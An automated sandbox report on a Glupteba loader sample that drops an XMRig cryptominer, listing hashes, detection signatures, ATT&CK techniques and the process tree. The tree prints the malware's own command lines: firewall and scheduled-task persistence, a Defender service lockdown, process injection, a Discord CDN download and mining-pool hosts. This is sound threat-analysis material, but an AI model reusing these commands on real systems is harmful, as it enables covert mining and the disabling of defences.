Analysis
-
max time kernel
281s -
max time network
304s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
-
submitted
12-02-2024 04:55
General
-
Target
590c983548da22c3982cb2dc20b38da09be5f3a43352c94715ff910b3ca98623.exe
-
Size
4.1MB
-
MD5
195dc288a25ed3e9910dd70c974731cb
-
SHA1
c789a72484f6338e4a99131ff6f3870e145a7c7a
-
SHA256
590c983548da22c3982cb2dc20b38da09be5f3a43352c94715ff910b3ca98623
-
SHA512
50829d498feccef1a21a227fba6c1b7767edee85eee8c1224669c22b96ca1feddc9d3e9904d1d3d6e282b54df0db3652050d801bd5294a16ae2b4a2ff3df6446
-
SSDEEP
98304:YiBEIcv4/bMzu4PVhDS65NAXXYh2mEuFXVhFItTs:Yii/zuKjDS65N1DEuFXVhqFs
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 36 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
XMRig Miner payload 4 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Executes dropped EXE 5 IoCs
-
UPX packed file 8 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 7 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 8 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of WriteProcessMemory 45 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\590c983548da22c3982cb2dc20b38da09be5f3a43352c94715ff910b3ca98623.exe"C:\Users\Admin\AppData\Local\Temp\590c983548da22c3982cb2dc20b38da09be5f3a43352c94715ff910b3ca98623.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\590c983548da22c3982cb2dc20b38da09be5f3a43352c94715ff910b3ca98623.exe"C:\Users\Admin\AppData\Local\Temp\590c983548da22c3982cb2dc20b38da09be5f3a43352c94715ff910b3ca98623.exe"2⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
- Executes dropped EXE
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 51005⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id e3e98f87-4d3e-4611-8cfa-0ada8c3abeb0 --tls --nicehash -o showlock.net:443 --rig-id e3e98f87-4d3e-4611-8cfa-0ada8c3abeb0 --tls --nicehash -o showlock.net:80 --rig-id e3e98f87-4d3e-4611-8cfa-0ada8c3abeb0 --nicehash --http-port 3433 --http-access-token e3e98f87-4d3e-4611-8cfa-0ada8c3abeb0 --randomx-wrmsr=-15⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA25661f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA51231e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
1.7MB
MD5c98735f7ad116c8f909f30a466538f3e
SHA10165b1e02190f6363bdde853daeac149cc90e521
SHA256fcf1de29313c31c7984274662cb845c989f7693bd9761752996ff3b240872099
SHA51267d50a0a8d12dbd3947a869bccac003df0cdc8906bc0b20aea937c6c39b6d51381c9b852d92ed4baefdbd0a5a5ba63218f6b9a2abd7417e71d6a7dad38fbe385
-
Filesize
1.5MB
MD5f9fd66fb4eba65ff3b6cf7e70ef18351
SHA10ec8d509b247d0b59405e6a4fc4b1b29bb19d38c
SHA256944da82afd80366dfa7b04cc99c0c1b874380c54db63ba37064f33b702738550
SHA512da8c4d1f8763de61612d99327c13d3f585286101dce864a408ab65dc5e1f336506618532f9f7d5df2ca7d67159402d7339858dc8f205ad58c755abe64fe7ef83
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
18KB
MD5d406ed6eccb9e0c05f2599b93d0e6649
SHA13ec66203c30b8937febfccca465bad655b358264
SHA2563657cae6fe3014fc1e5b7e4755daad5bb2943215a5a0ea4a4be5e79b38855fb2
SHA5129adfba76058cf7e75234ce7970290072ed2e19f212123807d5c25fba9dcbff7a5e94d207f156e93ba45ae0873574de4eeb96016daafb058fa2dab50ca7726c4f
-
Filesize
18KB
MD5bd5eb089e87764ec9998c0fecc539a5b
SHA13a192b8f085f537591dfc2170fe15c3923347829
SHA2567df6c2c525a31d7e3a1a3dc3795f8691dca8f1cb150e451a52ddfbfa41545488
SHA51219e6f32e156872cd14bebe5d467bf42684cf8b5cddf5d558e15a2d61f35ef52860a9757412f801a4bc92f27ac219a725d9e53b713ba8e3293ccbad825df76922
-
Filesize
18KB
MD55407c972233c9d8443c543df1840286d
SHA187c34c317cb0e11a10a0a7c8185849ff7c1ff180
SHA256cbf4ade571fec8dabdbcce2579ec45ea54803a54a97b880cb7366f6d7f1c38d4
SHA512518ec57f3839552971ea4ee0335062716032e8a74379a0cf9acb5fac37789a5f8cb3e61c168c857f3512503a1ad700bb3c1fc50152e8cc96b67d416de164377a
-
Filesize
18KB
MD5569a066ffaa29002ddb3d8c76d265be0
SHA1665db4bc19dd203e1a211daee385a4f4a8142033
SHA2561fbda8f6053d0d15dee86afc87045227800da6327bac0d4ec5557bc0848eb18e
SHA5122d83e5755db952218665ebee0f4cb4eb3eaf6788d9a75bfdb0d76894e0c6e3e64934153de4b5ebdf8f8b06ad188297a6d2d8c55df50cf45396c6a2e572170cb7
-
Filesize
18KB
MD597299e59265031d0362fff15103ec097
SHA1adeddfd19bf707b471ac8b7b005cf2c776809bae
SHA256ee8f0469bacc8861aeb91bf1f140972fc724f3dcdd266fd06430009da2e7ab9f
SHA512256c8fc9cad40c591934627463038ed352abafcc68659c50af01dc11fd116d773c72a4126d685d7dccb94529213b24fd74c7407c145f54056af34cf61ea71096
-
Filesize
18KB
MD586be539b9bdb3a2e82c6232a94bf3e92
SHA12f942896f43a0c42bf299cbdeb1520a92819dbb6
SHA2562f9e38b9794972e87ccaaa0a377477ef4845d45b2ffd327f1c8d44f57169eb5f
SHA512ec0db6e405fcadab39e5b96acb95e7fc5aa4ab941f533ed12cae4ac69920c7d44249e2bd4aa1d0c2648c2187d64c7f9982d7561b916b061bddaac5f95ef3df8d
-
Filesize
18KB
MD54123eca00d0f1c0da065e8a21776650e
SHA18bf02e19908cc2c05f9e9cd459206906af2ef778
SHA256eeea38ee84ae538496e0577a08e40589c1c28272cb0935c3e32dec29b7c7e2d3
SHA512ce86c3ee87c8e86bee4d4c824f70d685524ba8f291818ba35e94983388606253eae04aa426fdf61f037c29df7e07e631f1b89244ff84caaef2d6a146d233522e
-
Filesize
4.1MB
MD5195dc288a25ed3e9910dd70c974731cb
SHA1c789a72484f6338e4a99131ff6f3870e145a7c7a
SHA256590c983548da22c3982cb2dc20b38da09be5f3a43352c94715ff910b3ca98623
SHA51250829d498feccef1a21a227fba6c1b7767edee85eee8c1224669c22b96ca1feddc9d3e9904d1d3d6e282b54df0db3652050d801bd5294a16ae2b4a2ff3df6446
-
Filesize
1.1MB
MD5a4d853089cd809281552d6297b62013d
SHA1ba9a21b589af1ccaad303322df731d570df4e786
SHA2563aac7a398e218288accb4a6e22a33ed73815fc99d3421ff3f48e4f93b1567fe5
SHA512ac68ee5f156f00853c47263789c9f83a54d4c5c5ed0dec90736afaff45034e8b1f2e0312bc230aabe3bc7a2a8145c5641cbf39d26297f412e37e7d7925f27c98
-
Filesize
1.2MB
MD500c9bb637da1fe4bb97da5db7267ec59
SHA1c28a32714b75fc90974fa87bd088902bb6e2d887
SHA256847d6c3d1c0f0540485cf14efe445ec94c93d6f69777f6453961ceb5cdc86eec
SHA5120230c0b45526e9434c44785b3e157d138805abad04d5acd433c31383d681926003cc693636151e79be43c84c62ce93b2996a9ffb605309596c4d1f8898df1091
-
Filesize
704KB
MD5d65cab291fe5d77083e2c9ad6de84342
SHA1f2800ac8f2ff23e32eaccc82fad979e211f6d784
SHA2566a290e392a32d5db6784d682dbc07cd3de9fb44d6a9d52f852abeb25cbbbf4da
SHA512c38f0a45c5c8eac68b1f56ed53ff167318d78ae292865718c3c7624cfc0bd48fcdd003f5295b9a74cb323600d4ce405dba349ebc1a68d06d3db875c8625852fb
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
64KB
-
Filesize
300KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
8.9MB
-
Filesize
8.9MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
112KB
-
Filesize
300KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
6.9MB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
240KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
592KB
-
Filesize
6.9MB
-
Filesize
216KB
-
Filesize
64KB
-
Filesize
660KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
204KB
-
Filesize
64KB
-
Filesize
472KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
660KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
128KB